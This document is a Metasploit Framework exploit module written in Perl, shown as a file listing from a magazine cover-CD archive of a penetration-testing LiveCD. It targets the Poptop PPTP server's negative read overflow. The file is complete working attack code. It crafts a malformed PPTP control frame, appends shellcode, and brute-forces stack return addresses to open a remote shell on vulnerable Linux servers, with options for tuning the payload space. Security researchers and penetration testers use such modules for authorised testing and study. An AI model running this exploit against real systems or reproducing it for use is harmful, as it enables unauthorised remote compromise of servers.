home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / poptop_negative_read.pm < prev    next >
Text File  |  2006-06-30  |  8KB  |  310 lines

  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::poptop_negative_read;
  11. use strict;
  12. use base 'Msf::Exploit';
  13. use Pex::Struct;
  14. use Pex::Text;
  15.  
  16. my $advanced =
  17.   {
  18.     'StackTop'     => ['0xbffffa00', 'Start address for stack ret bruteforcing.'],
  19.     'StackBottom'  => ['0xbffff000', 'End address for stack ret bruteforcing.'],
  20.     'StackStep'    => [0, 'Step size for ret bruteforcing, 0 for auto calculation.'],
  21.     'BruteWait'    => [.4, 'Length in seconds to wait between bruteforce attempts'],
  22.  
  23.     # calculated at 228,  fudge to make more universal
  24.     'PreRetLength' => [220, 'Space before the we start writing return address.  Note: this + ExtraSpace is how much space we have for the payload.'],
  25.     'RetLength'    => [32, 'Length of rets after payload'],
  26.     'ExtraSpace'   => [0, "The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows).  I've had successful exploitation with this set to 154, but nothing over 128 is suggested."],
  27.     'Hostname'     => ['', 'PPTP Packet Hostname'],
  28.     'Vendor'       => ['Microsoft Windows NT', 'PPTP Packet Hostname'],
  29.   };
  30.  
  31. my $info = {
  32.     'Name'    => 'Poptop Negative Read Overflow',
  33.     'Version' => '$Revision: 1.46 $',
  34.     'Authors' => [ 'spoonm <ninjatools [at] hush.com>', ],
  35.  
  36.     'Arch'    => [ 'x86' ],
  37.     'OS'      => [ 'linux' ],
  38.     'Priv'    => 1,
  39.  
  40.     'UserOpts'  =>
  41.       {
  42.         'RHOST' => [1, 'ADDR', 'The target address'],
  43.         'RPORT' => [1, 'PORT', 'The Poptop port', 1723],
  44.       },
  45.  
  46.     'Payload' =>
  47.       {
  48.         'Space'     => 0, # We override this to do it dynamically
  49.         'BadChars'  => '', # Eh, we don't have any
  50.         'PrependEncoder'   => "\x81\xC4\xC0\xFB\xFF\xFF", # add esp,0xfffffbc0 (-1088)
  51.         'MinNops'   => 16,
  52.       },
  53.  
  54.     'Nop' =>
  55.       {
  56.         'SaveRegs' => ['esp'],
  57.       },
  58.  
  59.     'Description'  => Pex::Text::Freeform(qq{
  60.     This is an exploit for the Poptop negative read overflow.  This will
  61.     work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I
  62.     currently do not have a good way to detect Poptop versions.
  63.  
  64.     The server will by default only allow 4 concurrent manager processes
  65.     (what we run our code in), so you could have a max of 4 shells at once.
  66.  
  67.     Using the current method of exploitation, our socket will be closed
  68.     before we have the ability to run code, preventing the use of Findsock.
  69. }),
  70.  
  71.     'Refs'  =>
  72.       [
  73.         ['OSVDB', '3293'],
  74.         ['URL',   'http://securityfocus.com/archive/1/317995'],
  75.         ['URL',   'http://www.freewebs.com/blightninjas/'],
  76.         ['MIL',   '50'],
  77.       ],
  78.  
  79.     'DefaultTarget' => 0,
  80.     'Targets' =>
  81.       [
  82.         ['Bruteforce'],
  83.       ],
  84.  
  85.     'Keys'  => ['poptop'],
  86.  
  87.     'DisclosureDate' => 'Apr 9 2003',
  88.   };
  89.  
  90. sub new {
  91.     my $class = shift;
  92.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  93.  
  94.     return($self);
  95. }
  96.  
  97. # Override the PayloadSpace method
  98. sub PayloadSpace {
  99.     my $self = shift;
  100.     return($self->GetLocal('PreRetLength') + $self->GetLocal('ExtraSpace'));
  101. }
  102.  
  103. my $structHeader =
  104.   [
  105.     'b_u_16' => 'length',
  106.     'b_u_16' => 'pptp_type',
  107.     'b_u_32' => 'magic',
  108.     'b_u_16' => 'ctrl_type',
  109.     'b_u_16' => 'reserved0',
  110.   ];
  111.  
  112. my $structBegin =
  113.   [
  114.     'struct' => 'header',
  115.     'u_8'    => 'version_major',
  116.     'u_8'    => 'version_minor',
  117.   ];
  118. my $structEnd =
  119.   [
  120.     'b_u_32' => 'framing_cap',
  121.     'b_u_32' => 'bearer_cap',
  122.     'b_u_16' => 'max_channels',
  123.     'b_u_16' => 'firmware_rev',
  124.     'string' => 'hostname',
  125.     'string' => 'vendor',
  126.   ];
  127.  
  128. sub Check {
  129.     my $self = shift;
  130.  
  131.     my $targetHost  = $self->GetVar('RHOST');
  132.     my $targetPort  = $self->GetVar('RPORT');
  133.  
  134.     my $pptpHeader = Pex::Struct->newC(
  135.         $structHeader,
  136.       );
  137.  
  138.     $pptpHeader->Set(
  139.         'length'    => 156,
  140.         'pptp_type' => 1,  # PPTP_CTRL_MESSAGE
  141.         'magic'     => 0x1a2b3c4d,
  142.         'ctrl_type' => 1,  # START_CTRL_CONN_RQST
  143.         'reserved0' => 0,
  144.       );
  145.  
  146.     my $pptpCtrl = Pex::Struct->newC(
  147.         [
  148.             @{$structBegin},
  149.             'b_u_16' => 'reserved1',
  150.             @{$structEnd},
  151.         ]
  152.       );
  153.  
  154.     $pptpCtrl->Set(
  155.         'header'         => $pptpHeader,
  156.         'version_major'  => 1,
  157.         'version_minor'  => 0,
  158.         'reserved1'      => 0,
  159.         'framing_cap'    => 1,
  160.         'bearer_cap'     => 1,
  161.         'max_channels'   => 0,
  162.         'firmware_rev'   => 2600,
  163.         'hostname'       => Pex::Text::PadBuffer($self->GetLocal('Hostname'), 64),
  164.         'vendor'         => Pex::Text::PadBuffer($self->GetLocal('Vendor'), 64),
  165.       );
  166.  
  167.     my $pptpPayload = $pptpCtrl->Fetch;
  168.  
  169.     my $sock = Msf::Socket::Tcp->new
  170.       (
  171.         'PeerAddr'  => $targetHost,
  172.         'PeerPort'  => $targetPort,
  173.         'LocalPort' => $self->GetVar('CPORT'),
  174.         'SSL'       => $self->GetVar('SSL'),
  175.       );
  176.  
  177.     if ($sock->IsError) {
  178.         $self->PrintLine('Error creating socket: '.$sock->GetError);
  179.         return $self->CheckCode('Connect');
  180.     }
  181.  
  182.     if(!$sock->Send($pptpPayload)) {
  183.         $self->PrintLine('Error in send.');
  184.         $sock->PrintError;
  185.         return $self->CheckCode('Generic');
  186.     }
  187.  
  188.     my $pptpResp = Pex::Struct->newC(
  189.         [
  190.             @{$structBegin},
  191.             'u_8'   => 'result_code',
  192.             'u_8'   => 'error_code',
  193.             @{$structEnd},
  194.         ]
  195.       );
  196.  
  197.     $pptpResp->Set('header', $pptpHeader);
  198.  
  199.     $pptpResp->SetSize('hostname', 64);
  200.     $pptpResp->SetSize('vendor', 64);
  201.  
  202.     my $resp = $sock->Recv(-1);
  203.     if(!$pptpResp->Fill($resp)) {
  204.         $self->PrintLine('[*] Error parsing server response.');
  205.         return $self->CheckCode('Generic');
  206.     }
  207.  
  208.     $sock->Close;
  209.  
  210.     $self->PrintLine('[*] PPTP Response Data');
  211.  
  212.     my $data = $pptpResp->RecursiveGet;
  213.     foreach (@{$data}) {
  214.         $self->PrintLine($_->[0] . ': ' . $_->[1]);
  215.     }
  216.  
  217.     if($pptpResp->Get('vendor') =~ /MoretonBay/) {
  218.         $self->PrintLine('[*] Vendor tag matches, may be Poptop');
  219.         return $self->CheckCode('Detected');
  220.     }
  221.  
  222.     return $self->CheckCode('Safe');
  223. }
  224.  
  225. sub Exploit {
  226.     my $self = shift;
  227.  
  228.     my $targetHost  = $self->GetVar('RHOST');
  229.     my $targetPort  = $self->GetVar('RPORT');
  230.     my $targetIndex = $self->GetVar('TARGET');
  231.     my $encodedPayload = $self->GetVar('EncodedPayload');
  232.     my $shellcode   = $encodedPayload->Payload;
  233.  
  234.     my $pptpHeader = Pex::Struct->newC(
  235.         $structHeader,
  236.       );
  237.  
  238.     $pptpHeader->Set(
  239.         'length'    => 1,  # ;)
  240.         'pptp_type' => 1,  # PPTP_CTRL_MESSAGE
  241.         'magic'     => 0x1a2b3c4d,
  242.         'ctrl_type' => 1,  # START_CTRL_CONN_RQST
  243.         'reserved0' => 0,
  244.       );
  245.  
  246.     my $pptpCtrl = Pex::Struct->newC(
  247.         [
  248.             @{$structBegin},
  249.             'b_u_16' => 'reserved1',
  250.             @{$structEnd},
  251.         ]
  252.       );
  253.  
  254.     $pptpCtrl->Set(
  255.         'header'         => $pptpHeader,
  256.         'version_major'  => 1,
  257.         'version_minor'  => 0,
  258.         'reserved1'      => 0,
  259.         'framing_cap'    => 1,
  260.         'bearer_cap'     => 1,
  261.         'max_channels'   => 0,
  262.         'firmware_rev'   => 2600,
  263.         'hostname'       => Pex::Text::PadBuffer($self->GetLocal('Hostname'), 64),
  264.         'vendor'         => Pex::Text::PadBuffer($self->GetLocal('Vendor'), 64),
  265.       );
  266.  
  267.     my $pptpPayload = $pptpCtrl->Fetch;
  268.  
  269.     $self->PrintDebugLine(1, "ExtraSpace: " . $self->GetLocal('ExtraSpace'));
  270.     substr($pptpPayload, -1 * $self->GetLocal('ExtraSpace'), $self->GetLocal('ExtraSpace'), '');
  271.  
  272.     my $retLength   = $self->GetLocal('RetLength');
  273.     my $bruteWait   = $self->GetLocal('BruteWait');
  274.     my $stackTop    = hex($self->GetLocal('StackTop'));
  275.     my $stackBottom = hex($self->GetLocal('StackBottom'));
  276.     my $stackStep   = $self->GetLocal('StackStep');
  277.  
  278.     $stackStep = $encodedPayload->NopsLength if($stackStep == 0);
  279.     $stackStep -= $stackStep % 4;
  280.  
  281.     for(my $ret = $stackTop; $ret >= $stackBottom; $ret -= $stackStep) {
  282.         my $sock = Msf::Socket::Tcp->new
  283.           (
  284.             'PeerAddr'  => $targetHost,
  285.             'PeerPort'  => $targetPort,
  286.             'LocalPort' => $self->GetVar('CPORT'),
  287.             'SSL'       => $self->GetVar('SSL'),
  288.           );
  289.  
  290.         if ($sock->IsError) {
  291.             $sock->PrintError;
  292.             return;
  293.         }
  294.  
  295.         $self->PrintLine(sprintf("Trying %#08x", $ret));
  296.  
  297.         if(!$sock->Send($pptpPayload . $shellcode . (pack('V', $ret) x int($retLength / 4)))) {
  298.             $self->PrintLine('Error in send.');
  299.             $sock->PrintError;
  300.         }
  301.  
  302.         $self->Handler($sock);
  303.         $sock->Close;
  304.         select(undef, undef, undef, $bruteWait); # ghetto sleep
  305.     }
  306.     return;
  307. }
  308.  
  309. 1;
  310.